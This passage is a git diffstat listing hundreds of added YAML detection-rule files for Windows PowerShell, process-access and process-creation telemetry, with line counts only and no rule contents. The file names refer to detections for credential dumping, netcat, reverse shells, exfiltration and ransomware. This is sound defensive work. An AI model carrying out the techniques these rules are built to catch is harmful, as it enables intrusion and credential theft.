.../posh_ps_data_compressed.yml | 26 + .../posh_ps_detect_vm_env.yml | 30 + .../posh_ps_directorysearcher.yml | 27 + ...ps_directoryservices_accountmanagement.yml | 24 + .../posh_ps_dnscat_execution.yml | 23 + ...mp_password_windows_credential_manager.yml | 37 + .../posh_ps_enable_psremoting.yml | 23 + ...te_password_windows_credential_manager.yml | 30 + .../posh_ps_etw_trace_evasion.yml | 31 + .../posh_ps_file_and_directory_discovery.yml | 29 + .../posh_ps_get_acl_service.yml | 27 + .../posh_ps_get_adreplaccount.yml | 28 + .../posh_ps_get_childitem_bookmarks.yml | 31 + .../powershell_script/posh_ps_hotfix_enum.yml | 23 + .../posh_ps_icmp_exfiltration.yml | 26 + .../posh_ps_invoke_command_remote.yml | 25 + .../posh_ps_invoke_dnsexfiltration.yml | 29 + .../posh_ps_invoke_nightmare.yml | 23 + .../posh_ps_invoke_obfuscation_clip.yml | 25 + ...h_ps_invoke_obfuscation_obfuscated_iex.yml | 30 + .../posh_ps_invoke_obfuscation_stdin.yml | 25 + .../posh_ps_invoke_obfuscation_var.yml | 25 + ...osh_ps_invoke_obfuscation_via_compress.yml | 31 + .../posh_ps_invoke_obfuscation_via_rundll.yml | 29 + .../posh_ps_invoke_obfuscation_via_stdin.yml | 25 + ...osh_ps_invoke_obfuscation_via_use_clip.yml | 25 + ...sh_ps_invoke_obfuscation_via_use_mhsta.yml | 31 + ...ps_invoke_obfuscation_via_use_rundll32.yml | 34 + .../posh_ps_invoke_obfuscation_via_var.yml | 25 + .../powershell_script/posh_ps_keylogging.yml | 28 + .../powershell_script/posh_ps_localuser.yml | 31 + .../posh_ps_malicious_commandlets.yml | 204 + .../posh_ps_malicious_keywords.yml | 43 + ...ps_memorydump_getstoragediagnosticinfo.yml | 24 + .../powershell_script/posh_ps_msxml_com.yml | 31 + .../posh_ps_nishang_malicious_commandlets.yml | 94 + .../posh_ps_ntfs_ads_access.yml | 30 + .../posh_ps_office_comobject_registerxll.yml | 27 + ...osh_ps_powerview_malicious_commandlets.yml | 148 + .../posh_ps_prompt_credentials.yml | 25 + .../powershell_script/posh_ps_psattack.yml | 23 + .../posh_ps_remote_session_creation.yml | 26 + .../posh_ps_remove_item_path.yml | 30 + .../posh_ps_request_kerberos_ticket.yml | 24 + .../posh_ps_root_certificate_installed.yml | 29 + .../posh_ps_run_from_mount_diskimage.yml | 29 + .../posh_ps_security_software_discovery.yml | 33 + .../posh_ps_send_mailmessage.yml | 26 + ...posh_ps_set_policies_to_unsecure_level.yml | 35 + .../posh_ps_shellcode_b64.yml | 30 + ...sh_ps_shellintel_malicious_commandlets.yml | 27 + .../posh_ps_software_discovery.yml | 28 + ...ps_store_file_in_alternate_data_stream.yml | 27 + .../posh_ps_susp_ad_group_reco.yml | 30 + .../posh_ps_susp_directory_enum.yml | 30 + .../posh_ps_susp_download.yml | 27 + .../posh_ps_susp_execute_batch_script.yml | 30 + .../posh_ps_susp_export_pfxcertificate.yml | 24 + .../posh_ps_susp_extracting.yml | 29 + .../posh_ps_susp_follina_execution.yml | 27 + .../posh_ps_susp_get_adcomputer.yml | 24 + ...susp_get_addefaultdomainpasswordpolicy.yml | 23 + .../posh_ps_susp_get_adgroup.yml | 24 + .../posh_ps_susp_get_current_user.yml | 26 + .../posh_ps_susp_get_gpo.yml | 23 + .../posh_ps_susp_get_process.yml | 23 + .../posh_ps_susp_getprocess_lsass.yml | 23 + .../posh_ps_susp_gettypefromclsid.yml | 25 + .../powershell_script/posh_ps_susp_gwmi.yml | 25 + .../posh_ps_susp_hyper_v_condlet.yml | 26 + .../posh_ps_susp_invocation_generic.yml | 34 + .../posh_ps_susp_invocation_specific.yml | 71 + ...sh_ps_susp_invoke_webrequest_useragent.yml | 26 + .../posh_ps_susp_iofilestream.yml | 26 + .../posh_ps_susp_keywords.yml | 37 + .../posh_ps_susp_local_group_reco.yml | 30 + .../posh_ps_susp_mail_acces.yml | 27 + .../posh_ps_susp_mount_diskimage.yml | 25 + .../posh_ps_susp_mounted_share_deletion.yml | 25 + .../posh_ps_susp_networkcredential.yml | 26 + .../posh_ps_susp_new_psdrive.yml | 28 + .../posh_ps_susp_recon_export.yml | 28 + .../posh_ps_susp_remove_adgroupmember.yml | 27 + .../posh_ps_susp_smb_share_reco.yml | 24 + .../posh_ps_susp_ssl_keyword.yml | 25 + .../posh_ps_susp_start_process.yml | 26 + .../posh_ps_susp_unblock_file.yml | 25 + .../posh_ps_susp_wallpaper.yml | 30 + .../posh_ps_susp_win32_pnpentity.yml | 23 + .../posh_ps_susp_win32_shadowcopy.yml | 25 + .../posh_ps_susp_windowstyle.yml | 24 + .../posh_ps_susp_zip_compress.yml | 27 + .../posh_ps_syncappvpublishingserver_exe.yml | 27 + .../posh_ps_tamper_defender.yml | 58 + .../posh_ps_test_netconnection.yml | 31 + .../powershell_script/posh_ps_timestomp.yml | 30 + .../posh_ps_trigger_profiles.yml | 29 + .../powershell_script/posh_ps_upload.yml | 31 + .../powershell_script/posh_ps_web_request.yml | 33 + .../posh_ps_win32_product_install_msi.yml | 27 + ...h_ps_windows_firewall_profile_disabled.yml | 29 + .../posh_ps_winlogon_helper_dll.yml | 27 + .../posh_ps_wmi_persistence.yml | 33 + .../powershell_script/posh_ps_wmimplant.yml | 45 + .../powershell_script/posh_ps_xml_iex.yml | 30 + ...c_access_win_cmstp_execution_by_access.yml | 32 + ...win_cobaltstrike_bof_injection_pattern.yml | 27 + ...proc_access_win_cred_dump_lsass_access.yml | 137 + ...ccess_win_direct_syscall_ntopenprocess.yml | 40 + ...roc_access_win_handlekatz_lsass_access.yml | 29 + ...ccess_win_in_memory_assembly_execution.yml | 100 + .../proc_access_win_invoke_phantom.yml | 25 + ...ess_win_lazagne_cred_dump_lsass_access.yml | 28 + ...ss_win_littlecorporal_generated_maldoc.yml | 26 + ...ndocumented_autoelevated_com_interface.yml | 30 + ...proc_access_win_lsass_dump_comsvcs_dll.yml | 25 + .../proc_access_win_lsass_memdump.yml | 46 + .../proc_access_win_lsass_memdump_evasion.yml | 55 + ...oc_access_win_lsass_memdump_indicators.yml | 51 + .../proc_access_win_lsass_werfault.yml | 25 + ..._access_win_malware_verclsid_shellcode.yml | 32 + .../proc_access_win_mimikatz_trough_winrm.yml | 30 + ...ss_win_pypykatz_cred_dump_lsass_access.yml | 28 + ...proc_access_win_rare_proc_access_lsass.yml | 96 + ...proc_access_win_susp_proc_access_lsass.yml | 106 + ...win_susp_proc_access_lsass_susp_source.yml | 87 + .../proc_access_win_svchost_cred_dump.yml | 24 + ...roc_access_win_uac_bypass_wow64_logger.yml | 24 + ...access_win_shellcode_inject_msf_empire.yml | 23 + .../process_access_win_susp_seclogon.yml | 26 + .../proc_creation_win_7zip_cve_2022_29072.yml | 27 + ...c_creation_win_abusing_debug_privilege.yml | 45 + ...sing_windows_telemetry_for_persistence.yml | 31 + ..._accesschk_usage_after_priv_escalation.yml | 38 + .../proc_creation_win_ad_find_discovery.yml | 43 + .../proc_creation_win_advanced_ip_scanner.yml | 32 + ...roc_creation_win_advanced_port_scanner.yml | 27 + ...oc_creation_win_alternate_data_streams.yml | 43 + ...ll_elevated_msi_spawned_cmd_powershell.yml | 32 + ...ays_install_elevated_windows_installer.yml | 42 + .../proc_creation_win_anydesk.yml | 26 + ...oc_creation_win_anydesk_silent_install.yml | 28 + .../proc_creation_win_anydesk_susp_folder.yml | 32 + ..._creation_win_apt_actinium_persistence.yml | 29 + ...proc_creation_win_apt_apt29_thinktanks.yml | 28 + .../proc_creation_win_apt_babyshark.yml | 30 + ...c_creation_win_apt_bear_activity_gtr19.yml | 36 + .../proc_creation_win_apt_bluemashroom.yml | 34 + .../proc_creation_win_apt_chafer_mar18.yml | 46 + .../proc_creation_win_apt_cloudhopper.yml | 29 + .../proc_creation_win_apt_dragonfly.yml | 26 + .../proc_creation_win_apt_elise.yml | 28 + ...c_creation_win_apt_emissarypanda_sep19.yml | 24 + .../proc_creation_win_apt_empiremonkey.yml | 26 + ...ation_win_apt_equationgroup_dll_u_load.yml | 28 + .../proc_creation_win_apt_evilnum_jul20.yml | 28 + .../proc_creation_win_apt_gallium.yml | 32 + .../proc_creation_win_apt_gallium_sha1.yml | 44 + ...oc_creation_win_apt_gamaredon_ultravnc.yml | 27 + .../proc_creation_win_apt_greenbug_may20.yml | 53 + .../proc_creation_win_apt_hafnium.yml | 76 + .../proc_creation_win_apt_hurricane_panda.yml | 28 + ...creation_win_apt_judgement_panda_gtr19.yml | 36 + .../proc_creation_win_apt_ke3chang_regadd.yml | 32 + ...reation_win_apt_lazarus_activity_apr21.yml | 31 + ...reation_win_apt_lazarus_activity_dec20.yml | 39 + .../proc_creation_win_apt_lazarus_loader.yml | 42 + ...ation_win_apt_lazarus_session_highjack.yml | 28 + ..._creation_win_apt_muddywater_dnstunnel.yml | 25 + .../proc_creation_win_apt_mustangpanda.yml | 38 + .../proc_creation_win_apt_revil_kaseya.yml | 45 + .../proc_creation_win_apt_slingshot.yml | 29 + .../proc_creation_win_apt_sofacy.yml | 36 + .../proc_creation_win_apt_sourgrum.yml | 41 + .../proc_creation_win_apt_ta17_293a_ps.yml | 24 + .../proc_creation_win_apt_ta505_dropper.yml | 26 + .../proc_creation_win_apt_taidoor.yml | 28 + .../proc_creation_win_apt_tropictrooper.yml | 20 + ...eation_win_apt_turla_commands_critical.yml | 31 + ...creation_win_apt_turla_commands_medium.yml | 33 + ...oc_creation_win_apt_turla_comrat_may20.yml | 32 + .../proc_creation_win_apt_unc2452_cmds.yml | 47 + .../proc_creation_win_apt_unc2452_ps.yml | 32 + ...c_creation_win_apt_unidentified_nov_18.yml | 22 + ...c_creation_win_apt_winnti_mal_hk_jan20.yml | 37 + .../proc_creation_win_apt_winnti_pipemon.yml | 30 + .../proc_creation_win_apt_wocao.yml | 42 + .../proc_creation_win_apt_zxshell.yml | 32 + ...ary_shell_execution_via_settingcontent.yml | 30 + ...roc_creation_win_archiver_iso_phishing.yml | 29 + ..._creation_win_asr_bypass_via_appvlp_re.yml | 49 + ...sian_confluence_cve_2021_26084_exploit.yml | 34 + .../proc_creation_win_attrib_hiding_files.yml | 32 + .../proc_creation_win_attrib_system.yml | 23 + ..._creation_win_attrib_system_susp_paths.yml | 45 + ...proc_creation_win_automated_collection.yml | 43 + ...on_win_bad_opsec_sacrificial_processes.yml | 47 + ...reation_win_base64_invoke_susp_cmdlets.yml | 40 + ...creation_win_base64_listing_shadowcopy.yml | 31 + ...on_win_base64_reflective_assembly_load.yml | 46 + .../proc_creation_win_bitsadmin_download.yml | 40 + ...ion_win_bitsadmin_download_susp_domain.yml | 47 + ...eation_win_bitsadmin_download_susp_ext.yml | 64 + ...reation_win_bitsadmin_download_susp_ip.yml | 53 + ...n_bitsadmin_download_susp_targetfolder.yml | 38 + ...tsadmin_download_uncommon_targetfolder.yml | 41 + .../proc_creation_win_bootconf_mod.yml | 35 + .../proc_creation_win_bypass_squiblytwo.yml | 44 + .../proc_creation_win_c3_load_by_rundll32.yml | 24 + .../proc_creation_win_certoc_execution.yml | 30 + ...ion_win_change_default_file_assoc_susp.yml | 30 + ...on_win_change_default_file_association.yml | 33 + ...roc_creation_win_chrome_load_extension.yml | 26 + .../proc_creation_win_cleanwipe.yml | 32 + .../proc_creation_win_clip.yml | 22 + .../proc_creation_win_cmd_delete.yml | 30 + .../proc_creation_win_cmd_dosfuscation.yml | 30 + .../proc_creation_win_cmd_redirect.yml | 22 + .../proc_creation_win_cmdkey_recon.yml | 32 + ...c_creation_win_cmstp_com_object_access.yml | 43 + ...eation_win_cmstp_execution_by_creation.yml | 30 + ...creation_win_cobaltstrike_bloopers_cmd.yml | 39 + ...tion_win_cobaltstrike_bloopers_modules.yml | 37 + ...tion_win_cobaltstrike_load_by_rundll32.yml | 29 + ...tion_win_cobaltstrike_process_patterns.yml | 40 + ...reation_win_commandline_path_traversal.yml | 28 + ...win_commandline_path_traversal_evasion.yml | 31 + ...oc_creation_win_conhost_path_traversal.yml | 22 + ...proc_creation_win_conti_cmd_ransomware.yml | 29 + .../proc_creation_win_conti_sqlcmd.yml | 33 + .../proc_creation_win_control_panel_item.yml | 40 + ...g_sensitive_files_with_credential_data.yml | 42 + ...roc_creation_win_crackmapexec_patterns.yml | 38 + ...oc_creation_win_creation_mavinject_dll.yml | 36 + ...creation_win_creative_cloud_node_abuse.yml | 28 + ..._credential_access_via_password_filter.yml | 26 + .../proc_creation_win_crime_fireball.yml | 29 + ...roc_creation_win_crime_maze_ransomware.yml | 42 + ...c_creation_win_crime_snatch_ransomware.yml | 29 + ...proc_creation_win_crypto_mining_monero.yml | 39 + .../proc_creation_win_curl_download.yml | 26 + ...creation_win_cve_2021_26857_msexchange.yml | 27 + ..._creation_win_data_compressed_with_rar.yml | 32 + ..._creation_win_delete_systemstatebackup.yml | 31 + ..._win_detecting_fake_instances_of_hxtsr.yml | 23 + .../proc_creation_win_dinjector.yml | 29 + ...roc_creation_win_discover_private_keys.yml | 40 + ...n_win_dns_exfiltration_tools_execution.yml | 24 + ..._creation_win_dns_serverlevelplugindll.yml | 37 + ..._win_dnscat2_powershell_implementation.yml | 33 + .../proc_creation_win_dotnet.yml | 32 + ..._creation_win_dsacls_abuse_permissions.yml | 33 + ...roc_creation_win_dsacls_password_spray.yml | 28 + .../proc_creation_win_dsim_remove.yml | 37 + ...roc_creation_win_dumpstack_log_evasion.yml | 23 + .../proc_creation_win_embed_exe_lnk.yml | 25 + ..._creation_win_encoded_frombase64string.yml | 30 + .../proc_creation_win_encoded_iex.yml | 41 + ...on_win_enumeration_for_credentials_cli.yml | 44 + ...numeration_for_credentials_in_registry.yml | 37 + .../proc_creation_win_esentutl_webcache.yml | 28 + ..._creation_win_etw_modification_cmdline.yml | 30 + .../proc_creation_win_etw_trace_evasion.yml | 53 + .../proc_creation_win_evil_winrm.yml | 26 + ...ltration_and_tunneling_tools_execution.yml | 27 + ...proc_creation_win_expand_cabinet_files.yml | 36 + ...roc_creation_win_exploit_cve_2015_1641.yml | 24 + ...roc_creation_win_exploit_cve_2017_0261.yml | 26 + ...oc_creation_win_exploit_cve_2017_11882.yml | 28 + ...roc_creation_win_exploit_cve_2017_8759.yml | 27 + ...roc_creation_win_exploit_cve_2019_1378.yml | 38 + ...roc_creation_win_exploit_cve_2019_1388.yml | 31 + ...oc_creation_win_exploit_cve_2020_10189.yml | 32 + ...roc_creation_win_exploit_cve_2020_1048.yml | 30 + ...roc_creation_win_exploit_cve_2020_1350.yml | 30 + ...reation_win_exploit_lpe_cve_2021_41379.yml | 24 + ...c_creation_win_exploit_systemnightmare.yml | 24 + ...oc_creation_win_false_sysinternalsuite.yml | 174 + ...tion_win_file_permission_modifications.yml | 42 + ...roc_creation_win_findstr_gpp_passwords.yml | 25 + ..._creation_win_fsutil_drive_enumeration.yml | 26 + ..._creation_win_fsutil_symlinkevaluation.yml | 29 + .../proc_creation_win_gotoopener.yml | 26 + ...n_win_grabbing_sensitive_hives_via_reg.yml | 51 + .../proc_creation_win_hack_adcspwn.yml | 23 + .../proc_creation_win_hack_bloodhound.yml | 45 + .../proc_creation_win_hack_cube0x0_tools.yml | 19 + .../proc_creation_win_hack_dumpert.yml | 23 + .../proc_creation_win_hack_hydra.yml | 30 + .../proc_creation_win_hack_koadic.yml | 33 + .../proc_creation_win_hack_krbrelay.yml | 38 + .../proc_creation_win_hack_krbrelayup.yml | 41 + .../proc_creation_win_hack_rubeus.yml | 39 + .../proc_creation_win_hack_secutyxploded.yml | 27 + .../proc_creation_win_hack_wce.yml | 33 + .../proc_creation_win_hacktool_imphashes.yml | 78 + .../proc_creation_win_hashcat.yml | 28 + ...ion_win_headless_browser_file_download.yml | 30 + .../proc_creation_win_hh_chm.yml | 28 + ...ion_win_hiding_malware_in_fonts_folder.yml | 56 + ...proc_creation_win_high_integrity_sdclt.yml | 25 + .../proc_creation_win_hktl_createminidump.yml | 25 + ...roc_creation_win_hktl_uacme_uac_bypass.yml | 24 + .../proc_creation_win_html_help_spawn.yml | 41 + .../proc_creation_win_hwp_exploits.yml | 31 + .../proc_creation_win_iis_http_logging.yml | 26 + ...c_creation_win_impacket_compiled_tools.yml | 72 + ...c_creation_win_impacket_lateralization.yml | 67 + .../proc_creation_win_indirect_cmd.yml | 31 + .../proc_creation_win_infdefaultinstall.yml | 29 + ...tion_win_install_reg_debugger_backdoor.yml | 32 + .../proc_creation_win_interactive_at.yml | 28 + ...c_creation_win_invoke_obfuscation_clip.yml | 24 + ...obfuscation_obfuscated_iex_commandline.yml | 30 + ..._creation_win_invoke_obfuscation_stdin.yml | 24 + ...oc_creation_win_invoke_obfuscation_var.yml | 24 + ...on_win_invoke_obfuscation_via_compress.yml | 30 + ...tion_win_invoke_obfuscation_via_rundll.yml | 28 + ...ation_win_invoke_obfuscation_via_stdin.yml | 24 + ...on_win_invoke_obfuscation_via_use_clip.yml | 24 + ...n_win_invoke_obfuscation_via_use_mhsta.yml | 30 + ...in_invoke_obfuscation_via_use_rundll32.yml | 33 + ...reation_win_invoke_obfuscation_via_var.yml | 24 + ...oc_creation_win_jlaive_batch_execution.yml | 35 + .../proc_creation_win_lethalhta.yml | 23 + ...n_local_system_owner_account_discovery.yml | 63 + .../proc_creation_win_logmein.yml | 26 + ...on_scripts_userinitmprlogonscript_proc.yml | 35 + .../proc_creation_win_lolbin_adplus.yml | 37 + ...oc_creation_win_lolbin_aspnet_compiler.yml | 23 + .../proc_creation_win_lolbin_bash.yml | 23 + ...oc_creation_win_lolbin_certoc_download.yml | 24 + ...proc_creation_win_lolbin_cl_invocation.yml | 26 + ...oc_creation_win_lolbin_cl_loadassembly.yml | 24 + ..._creation_win_lolbin_cl_mutexverifiers.yml | 24 + ...creation_win_lolbin_class_exec_xwizard.yml | 23 + .../proc_creation_win_lolbin_cmdl32.yml | 30 + ...eation_win_lolbin_configsecuritypolicy.yml | 29 + ...n_win_lolbin_cscript_gathernetworkinfo.yml | 30 + ...data_exfiltration_by_using_datasvcutil.yml | 39 + .../proc_creation_win_lolbin_diantz_ads.yml | 24 + ..._creation_win_lolbin_diantz_remote_cab.yml | 24 + ...eation_win_lolbin_dll_sideload_xwizard.yml | 24 + .../proc_creation_win_lolbin_dump64.yml | 27 + ...eation_win_lolbin_execution_via_winget.yml | 30 + .../proc_creation_win_lolbin_extexport.yml | 24 + .../proc_creation_win_lolbin_extrac32.yml | 31 + .../proc_creation_win_lolbin_extrac32_ads.yml | 24 + .../proc_creation_win_lolbin_findstr.yml | 45 + .../proc_creation_win_lolbin_forfiles.yml | 35 + ...reation_win_lolbin_fsharp_interpreters.yml | 27 + .../proc_creation_win_lolbin_gpscript.yml | 27 + .../proc_creation_win_lolbin_ie4uinit.yml | 30 + ...oc_creation_win_lolbin_ieexec_download.yml | 23 + .../proc_creation_win_lolbin_ilasm.yml | 24 + .../proc_creation_win_lolbin_jsc.yml | 22 + .../proc_creation_win_lolbin_mftrace.yml | 28 + ...c_creation_win_lolbin_msdt_answer_file.yml | 29 + ...reation_win_lolbin_offlinescannershell.yml | 25 + .../proc_creation_win_lolbin_openconsole.yml | 24 + .../proc_creation_win_lolbin_pcalua.yml | 23 + .../proc_creation_win_lolbin_pcwrun.yml | 30 + ...roc_creation_win_lolbin_pcwrun_follina.yml | 23 + .../proc_creation_win_lolbin_pktmon.yml | 22 + ...c_creation_win_lolbin_presentationhost.yml | 29 + .../proc_creation_win_lolbin_printbrm.yml | 26 + .../proc_creation_win_lolbin_pubprn.yml | 23 + ...tion_win_lolbin_rasautou_dll_execution.yml | 29 + .../proc_creation_win_lolbin_remote.yml | 23 + .../proc_creation_win_lolbin_replace.yml | 27 + ...win_lolbin_rundll32_installscreensaver.yml | 22 + .../proc_creation_win_lolbin_scriptrunner.yml | 25 + .../proc_creation_win_lolbin_squirrel.yml | 31 + ...eation_win_lolbin_susp_acccheckconsole.yml | 27 + ...proc_creation_win_lolbin_susp_atbroker.yml | 53 + ...ation_win_lolbin_susp_certreq_download.yml | 32 + ...olbin_susp_driver_installed_by_pnputil.yml | 35 + .../proc_creation_win_lolbin_susp_dxcap.yml | 26 + .../proc_creation_win_lolbin_susp_grpconv.yml | 23 + ...tion_win_lolbin_susp_mpcmdrun_download.yml | 31 + ...ion_win_lolbin_susp_sqldumper_activity.yml | 28 + .../proc_creation_win_lolbin_susp_wsl.yml | 32 + ...n_syncappvpublishingserver_execute_psh.yml | 32 + ...ncappvpublishingserver_vbs_execute_psh.yml | 31 + .../proc_creation_win_lolbin_ttdinject.yml | 22 + ..._creation_win_lolbin_tttracer_mod_load.yml | 29 + ...c_creation_win_lolbin_utilityfunctions.yml | 23 + ...ation_win_lolbin_visual_basic_compiler.yml | 23 + ...ation_win_lolbin_visualuiaverifynative.yml | 25 + ...c_creation_win_lolbin_vsiisexelauncher.yml | 26 + .../proc_creation_win_lolbin_wfc.yml | 23 + .../proc_creation_win_lolbin_winword.yml | 28 + .../proc_creation_win_lolbin_wlrmdr.yml | 30 + ...ion_win_lolbins_by_office_applications.yml | 41 + ...n_lolbins_with_wmiprvse_parent_process.yml | 34 + ...eation_win_long_powershell_commandline.yml | 28 + .../proc_creation_win_lsass_dump.yml | 36 + .../proc_creation_win_mailboxexport_share.yml | 32 + .../proc_creation_win_mal_adwind.yml | 29 + ...proc_creation_win_mal_blue_mockingbird.yml | 32 + ...c_creation_win_mal_darkside_ransomware.yml | 29 + ...eation_win_mal_hermetic_wiper_activity.yml | 26 + ...creation_win_mal_lockergoga_ransomware.yml | 24 + .../proc_creation_win_mal_ryuk.yml | 30 + .../proc_creation_win_malware_conti.yml | 28 + .../proc_creation_win_malware_conti_7zip.yml | 24 + ..._creation_win_malware_conti_shadowcopy.yml | 29 + .../proc_creation_win_malware_dridex.yml | 39 + .../proc_creation_win_malware_dtrack.yml | 27 + .../proc_creation_win_malware_emotet.yml | 41 + .../proc_creation_win_malware_formbook.yml | 52 + .../proc_creation_win_malware_notpetya.yml | 39 + .../proc_creation_win_malware_qbot.yml | 34 + .../proc_creation_win_malware_ryuk.yml | 27 + ...oc_creation_win_malware_script_dropper.yml | 39 + ...on_win_malware_trickbot_recon_activity.yml | 25 + ...c_creation_win_malware_trickbot_wermgr.yml | 25 + .../proc_creation_win_malware_wannacry.yml | 63 + .../proc_creation_win_manage_bde_lolbas.yml | 28 + .../proc_creation_win_mavinject_proc_inj.yml | 24 + ...r_cobaltstrike_getsystem_service_start.yml | 55 + ...roc_creation_win_mimikatz_command_line.yml | 58 + ...oc_creation_win_mmc20_lateral_movement.yml | 25 + .../proc_creation_win_mmc_spawn_shell.yml | 36 + ..._modif_of_services_for_via_commandline.yml | 71 + ...in_monitoring_for_persistence_via_bits.yml | 41 + .../proc_creation_win_mouse_lock.yml | 30 + .../proc_creation_win_msdeploy.yml | 33 + .../proc_creation_win_msdt.yml | 33 + .../proc_creation_win_msdt_diagcab.yml | 26 + ...roc_creation_win_msdt_susp_cab_options.yml | 26 + .../proc_creation_win_msdt_susp_parent.yml | 36 + ...creation_win_msedge_minimized_download.yml | 24 + .../proc_creation_win_mshta_javascript.yml | 28 + .../proc_creation_win_mshta_spawn_shell.yml | 41 + .../proc_creation_win_msiexec_dll.yml | 25 + .../proc_creation_win_msiexec_embedding.yml | 30 + .../proc_creation_win_msiexec_execute_dll.yml | 34 + ...roc_creation_win_msiexec_install_quiet.yml | 27 + ...oc_creation_win_msra_process_injection.yml | 32 + .../proc_creation_win_mstsc.yml | 34 + .../proc_creation_win_multiple_susp_cli.yml | 62 + .../proc_creation_win_net_enum.yml | 32 + .../proc_creation_win_net_use_admin_share.yml | 27 + .../proc_creation_win_net_user_add.yml | 33 + .../proc_creation_win_netcat_execution.yml | 36 + ...proc_creation_win_netsh_allow_port_rdp.yml | 32 + .../proc_creation_win_netsh_fw_add.yml | 31 + ...c_creation_win_netsh_fw_add_susp_image.yml | 60 + ...reation_win_netsh_fw_enable_group_rule.yml | 30 + ...proc_creation_win_netsh_packet_capture.yml | 26 + .../proc_creation_win_netsh_port_fwd.yml | 38 + .../proc_creation_win_netsh_port_fwd_3389.yml | 29 + ...n_win_netsh_wifi_credential_harvesting.yml | 29 + .../proc_creation_win_network_scan_loop.yml | 31 + .../proc_creation_win_network_sniffing.yml | 33 + ...proc_creation_win_new_service_creation.yml | 28 + .../proc_creation_win_nltest_recon.yml | 43 + ...reation_win_non_interactive_powershell.yml | 26 + .../proc_creation_win_non_priv_reg_or_ps.yml | 46 + ..._applications_spawning_wmi_commandline.yml | 33 + ..._creation_win_office_dir_traversal_cli.yml | 35 + ..._from_proxy_executing_regsvr32_payload.yml | 43 + ...from_proxy_executing_regsvr32_payload2.yml | 45 + .../proc_creation_win_office_shell.yml | 54 + ..._office_spawn_exe_from_users_directory.yml | 40 + ...on_win_office_spawning_wmi_commandline.yml | 37 + .../proc_creation_win_outlook_shell.yml | 65 + .../proc_creation_win_pingback_backdoor.yml | 28 + ..._creation_win_plugx_susp_exe_locations.yml | 96 + ...creation_win_possible_applocker_bypass.yml | 38 + ...vilege_escalation_via_service_reg_perm.yml | 33 + ...oc_creation_win_powershell_amsi_bypass.yml | 25 + ..._creation_win_powershell_audio_capture.yml | 23 + ..._creation_win_powershell_b64_shellcode.yml | 26 + .../proc_creation_win_powershell_bitsjob.yml | 29 + ...in_powershell_cmdline_reversed_strings.yml | 54 + ..._powershell_cmdline_special_characters.yml | 45 + ...wershell_cmdline_specific_comb_methods.yml | 55 + ...reation_win_powershell_defender_base64.yml | 43 + ...in_powershell_defender_disable_feature.yml | 72 + ...tion_win_powershell_defender_exclusion.yml | 33 + ...ation_win_powershell_disable_windef_av.yml | 38 + ..._creation_win_powershell_dll_execution.yml | 28 + ...eation_win_powershell_downgrade_attack.yml | 33 + .../proc_creation_win_powershell_download.yml | 30 + ...ation_win_powershell_download_patterns.yml | 28 + ...eation_win_powershell_frombase64string.yml | 24 + ..._creation_win_powershell_get_clipboard.yml | 26 + ..._creation_win_powershell_public_folder.yml | 24 + ...in_powershell_reverse_shell_connection.yml | 27 + ...reation_win_powershell_snapins_hafnium.yml | 29 + ...in_powershell_susp_parameter_variation.yml | 131 + ...reation_win_powershell_xor_commandline.yml | 33 + ...eation_win_powersploit_empire_schtasks.yml | 46 + ...proc_creation_win_proc_dump_createdump.yml | 29 + ...oc_creation_win_proc_dump_dumpminitool.yml | 29 + ...roc_creation_win_proc_dump_rdrleakdiag.yml | 29 + ...eation_win_proc_dump_susp_dumpminitool.yml | 34 + .../proc_creation_win_proc_wrong_parent.yml | 50 + .../proc_creation_win_procdump.yml | 28 + .../proc_creation_win_procdump_evasion.yml | 36 + ..._creation_win_process_dump_rdrleakdiag.yml | 22 + ...tion_win_process_dump_rundll32_comsvcs.yml | 39 + ...creation_win_protocolhandler_susp_file.yml | 29 + ...c_creation_win_proxy_execution_wuauclt.yml | 39 + .../proc_creation_win_psexesvc_start.yml | 21 + ...proc_creation_win_public_folder_parent.yml | 31 + ...oc_creation_win_purplesharp_indicators.yml | 26 + .../proc_creation_win_pypykatz.yml | 27 + .../proc_creation_win_python_pty_spawn.yml | 30 + .../proc_creation_win_query_registry.yml | 45 + .../proc_creation_win_ransom_blackbyte.yml | 29 + ...proc_creation_win_rdp_hijack_shadowing.yml | 25 + .../proc_creation_win_redirect_to_stream.yml | 22 + ...oc_creation_win_redmimicry_winnti_proc.yml | 31 + .../proc_creation_win_reg_add_run_key.yml | 25 + ...oc_creation_win_reg_defender_exclusion.yml | 32 + ...oc_creation_win_reg_defender_tampering.yml | 32 + .../proc_creation_win_reg_dump_sam.yml | 26 + .../proc_creation_win_reg_enable_rdp.yml | 45 + .../proc_creation_win_reg_lsass_ppl.yml | 31 + ...ation_win_reg_service_imagepath_change.yml | 33 + ...ation_win_regedit_export_critical_keys.yml | 36 + .../proc_creation_win_regedit_export_keys.yml | 36 + .../proc_creation_win_regedit_import_keys.yml | 38 + ...c_creation_win_regedit_import_keys_ads.yml | 36 + .../proc_creation_win_regini.yml | 30 + .../proc_creation_win_regini_ads.yml | 30 + ..._win_remote_powershell_session_process.yml | 28 + ...roc_creation_win_remote_time_discovery.yml | 29 + ...move_windows_defender_definition_files.yml | 30 + .../proc_creation_win_renamed_binary.yml | 69 + ...ion_win_renamed_binary_highly_relevant.yml | 52 + .../proc_creation_win_renamed_browsercore.yml | 23 + .../proc_creation_win_renamed_jusched.yml | 27 + .../proc_creation_win_renamed_megasync.yml | 27 + .../proc_creation_win_renamed_msdt.yml | 23 + .../proc_creation_win_renamed_paexec.yml | 38 + .../proc_creation_win_renamed_plink.yml | 24 + .../proc_creation_win_renamed_powershell.yml | 31 + .../proc_creation_win_renamed_procdump.yml | 35 + .../proc_creation_win_renamed_psexec.yml | 29 + .../proc_creation_win_renamed_rundll32.yml | 20 + .../proc_creation_win_renamed_whoami.yml | 25 + ...reation_win_root_certificate_installed.yml | 33 + .../proc_creation_win_rpcss_anomalies.yml | 26 + ...n_win_run_executable_invalid_extension.yml | 39 + .../proc_creation_win_run_from_zip.yml | 21 + ...ion_win_run_powershell_script_from_ads.yml | 26 + ...un_powershell_script_from_input_stream.yml | 26 + .../proc_creation_win_run_virtualbox.yml | 37 + ...creation_win_rundll32_not_from_c_drive.yml | 26 + ..._creation_win_rundll32_parent_explorer.yml | 26 + ...on_win_rundll32_registered_com_objects.yml | 29 + ...eation_win_rundll32_without_parameters.yml | 30 + ...tion_win_schtasks_appdata_local_system.yml | 29 + ...tasks_powershell_windowsapps_execution.yml | 35 + .../proc_creation_win_schtasks_reg_loader.yml | 35 + .../proc_creation_win_screenconnect.yml | 26 + ...roc_creation_win_screenconnect_anomaly.yml | 25 + ...eation_win_script_event_consumer_spawn.yml | 37 + ..._creation_win_sdbinst_shim_persistence.yml | 26 